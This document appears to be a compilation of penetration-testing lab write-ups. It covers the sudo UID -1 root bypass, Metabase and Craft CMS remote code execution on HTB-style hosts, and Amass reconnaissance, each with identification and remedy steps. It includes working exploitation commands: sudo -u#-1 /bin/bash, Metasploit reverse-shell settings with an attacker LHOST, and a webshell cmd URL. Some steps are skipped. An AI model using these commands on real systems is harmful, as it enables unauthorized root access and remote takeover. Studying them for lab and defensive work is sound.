Sudo could allow a local authenticated attacker to bypass security restrictions, caused by an issue with running commands with arbitrary user ID. By using the ALL keyword in a Runas specification, an attacker could exploit this vulnerability to bypass security restrictions and execute arbitrary command on the system with root privileges.
When sudo is configured to allow a user to run commands as an arbitrary user via the ALL keyword in a Runas specification, it is possible to run commands as root by specifying the user ID -1 or 4294967295.
This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification.
Log entries for commands run this way will list the target user as 4294967295 instead of root. In addition, PAM session modules will not be run for the command.
How this works
For example, sudo would usually be used like so: sudo <command>, but you could manually choose to execute it as another user like this: sudo -u#<id> <command>. This means that you would be pretending to be another user when you executed the chosen command, which can give you higher permissions than you might otherwise have had.
Say you have a user who you want to grant extra permissions to. You want to let this user execute a program as if they were any other user, but you don’t want to let them execute it as root. You might add this line to the sudoers file:
<user> ALL=(ALL:!root) NOPASSWD: ALL
With the above configuration, using sudo -u#0 <command> (the UID of root is always 0) would not work, as we’re not allowed to execute commands as root. If we try to execute commands as user 0 we will be given an error.
if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so. It is worth noting that this will only work if you’ve been granted non-root sudo permissions for the command, as in the configuration above.
Affected Products
Sudo 1.8.27
Identify
1. Print the version of sudo program running
sudo –version
2. Query sudo against your user, there should be at least an entry with (ALL, !root), Say you have a user who you want to grant extra permissions to. You want to let this user execute a program as if they were any other user, but you don’t want to let them execute it as root.
sudo -l
Note:
(ALL, !root): This part specifies the users and groups to which the rule applies. In this case, it applies to all users except for the user root. The ALL keyword means all users, and !root means “except for root”. So, this rule applies to all users except root.
NOPASSWD: This keyword indicates that the specified users/groups can execute the command without entering a password. In this case, the command is /bin/bash.
/bin/bash: This is the command or executable that the specified users/groups are allowed to run with sudo privileges without entering a password. In this case, it allows running the Bash shell (/bin/bash) without requiring a password.
Exploitation
1. With ALL specified, the trychackme user can run the binary /bin/bash as any user, so lets execute sudo command like this
sudo -u#0 <command>
sudo -u#-1 /bin/bash
whoami && hostname && date
2. Now you can see we became root user, Sudo doesn’t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root’s id
Remedy
Upgrade to the latest version of Sudo (1.8.28 or later)
Metabase is an open-source business intelligence (BI) and analytics tool that enables organizations to create and share dashboards and reports based on their data. It provides a user-friendly interface for exploring and visualizing data without requiring extensive technical knowledge or coding skills.
Metabase could allow a remote attacker to execute arbitrary commands on the system, caused by an unspecified flaw. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
Affected Products
Metabase Metabase 0.45.4
Metabase Metabase 0.44.7
Metabase Metabase 0.43.7
Metabase Metabase 1.43.7
Metabase Metabase 0.46.6
Metabase Metabase 1.44.7
Metabase Metabase 1.45.4
Identification
1. Navigating to /api/session/properties we can find the platform version
http://data.analytical.htb/api/session/properties
2. You can also use curl & jq to filter the output from CLI
curl -X GET http://data.analytical.htb/api/session/properties | jq “.version”
Exploitation #1 – Script
1. Having confirmed the vulnerable version, we can proceed to get the setup-token from /api/session/properties
http://data.analytical.htb/api/session/properties
2. We can proceed to use the exploit (https://github.com/m3m0o/metabase-pre-auth-rce-poc/tree/main) , this required the URL of the Metabase platform, the setup-token and a command
9. Now you should check your listener, and the connection should be received
whoami
Exploitation #2 – Metasploit
1. We can also use metasploit to exploit this vulnerability (metabase_setup_token_rce)
use exploit/linux/http/metabase_setup_token_rce
show options
2. Fill the required information
set RPORT 80
set RHOSTS data.analytical.htb
set LHOST 10.10.14.166
3. Run the exploit
exploit
Remedy
Metabase must upgrade to fixed versions (0.46.6.1, 1.46.6.1, or later)
Patching: Regularly update Metabase to the latest version to apply security patches.
Security Best Practices: Follow security best practices for deployment, including the use of firewalls, intrusion detection systems, and regular security audits.
Craft CMS could allow a remote authenticated attacker to execute arbitrary code on the system, caused by a flaw in the Craft installations. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.
The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.
Using this vulnerability in combination with The Imagick Extension and MSL which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem.
This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.
Affected Products
Craft CMS Craft CMS 4.4.14
affected at >= 4.0.0-RC1, <= 4.4.14
Identification
Wappalyzar
Source Code
curl http://website.com
curl http://website.com –i
HTTP headers (Proxy)
Manual (Proxy)
1. You can capture a HTTP request, and modify the data. Make sure the method is correct
2. Run craft-cms.py (sometimes you need to modify the source code for the webshell to be uploaded to a writable folder)
python3 craft-cms.py http://surveillance.htb
3. You can also run commands from shell.php (http://surveillance.htb/shell.php?cmd=whoami)
Important: remember to delete this file after your assessment. You can also upload a webshell having already the chance to execute commands.
Exploitation (Metasploit)
1. The exploit (craftcms_unauth_rce_cve_2023_41892) can be used to exploit this vulnerability and get a reverse shell
use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
show options
2. Set the options
set RHOSTS surveillance.htb
set LHOST tun0
3. (OPTIONAL) Modify the port and SSL, in my case the website was using port 80, without SSL
set RPORT 80
set SSL false
4. (OPTIONAL), set the function to inject our payload
set command system
5. Run the exploit
run
Remedy
Upgrade to the latest version of Craft CMS (3.8.15, 4.4.15 or later)
Besides applying the patch rotate the CRAFT_SECURITY_KEY immediately. knowing the key will lead to an unauthenticated RCE on a widely used CraftCMS plugin, and there may be more.
The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.
Amass comes installed in the latest Kali Linux, if you need to install it follow the official guide
1. The amass intel gathers basic information against the target using various other tools, It find IPv4 IPv6 addr and basic whois informations.
amass intel -d owasp.org -whois
2. Using Amass, you have the option to search for organizational names. This search can yield ASN IDs that have been assigned to the target.
amass intel -org ‘google’
We can see that we have retrieved asn numbers, Let’s try using the asn id against the target. Here the -active mean it choose the way it want to scan the target. It can be the google index or webmaster index and much more.
amass intel -active -asn 44384 -ip
Amass Enum
1. The enum option in amass will enumerate DNS services and also mapping around the network.
amass enum -passive -d google.com -src
2. We can also brute force the subdomains and try to get in, Let’s see how to do that ???? For EDUCATIONAL purpose only.
